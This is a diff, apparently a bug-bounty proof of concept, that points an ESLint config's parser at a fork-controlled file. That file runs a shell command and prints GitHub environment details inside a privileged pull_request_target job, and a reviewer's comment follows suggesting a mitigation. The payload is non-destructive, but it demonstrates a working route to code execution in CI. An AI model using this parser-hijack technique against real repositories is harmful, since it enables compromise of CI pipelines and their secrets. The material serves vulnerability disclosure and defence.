3 changes: 1 addition & 2 deletions .eslintrc.json
@@ -1,10 +1,9 @@
{
"parser": "@typescript-eslint/parser",
"parser": "./poc.js",
"parserOptions": {
"ecmaVersion": 2020,
"sourceType": "module",
"ecmaFeatures": {
// Allows for the parsing of JSX
"jsx": true
}
},
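--- /dev/null
+++ b/poc.js
@@ -0,0 +1,18 @@
+// Benign security PoC for Cantina submission: Uniswap/sybil-interface lint.yml pull_request_target RCE.
+// Proves fork-controlled code executes inside the privileged pull_request_target job via the eslint
+// `parser` field. Strictly non-destructive: no secret is read or exfiltrated, nothing is pushed to any
+// Uniswap repo. Returns the real parser so the lint job proceeds normally.
+module.exports = (() => {
+const cp = require("child_process");
+let who = "";
+try { who = cp.execSync("whoami").toString().trim(); } catch (e) { who = "err:" + e.message; }
+console.log("=== LINT_ACTION_PR_TARGET_RCE_POC ===");
+console.log("proof: fork-controlled parser executed via node require()");
+console.log("whoami: " + who);
+console.log("GITHUB_EVENT_NAME: " + process.env.GITHUB_EVENT_NAME);
+console.log("GITHUB_REPOSITORY: " + process.env.GITHUB_REPOSITORY);
+console.log("GITHUB_REF: " + process.env.GITHUB_REF);
+console.log("note: benign - no token read, no push; returning real parser");
+console.log("=== END LINT_ACTION_PR_TARGET_RCE_POC ===");
+return require("@typescript-eslint/parser");
+})();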
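Review bot: The header comment asserts the finding but does not record the repository-side mitigation or which logged value actually establishes it, which is what a triager of this submission needs first. ESLint loads the module named in `.eslintrc.json`'s `parser` field at config-resolution time, before any rule runs, so the exposure exists whenever a job holding the base repository's credentials checks out and lints fork-controlled files; a fourth header line such as `// Mitigation: lint fork PRs under pull_request (read-only token, no secrets) rather than pull_request_target, or do not check out the PR head in the privileged job.` would make that explicit. Of the values printed, `GITHUB_EVENT_NAME` is the one that distinguishes a privileged run from an ordinary `pull_request` run; `whoami` and `GITHUB_REPOSITORY` only corroborate, and a comment on that line saying so would help readers of the job log. As a point of style, the `"err:" + e.message` and `"whoami: " + who` style concatenations would read better as template literals, e.g. `who = \`err:${e.message}\`;`.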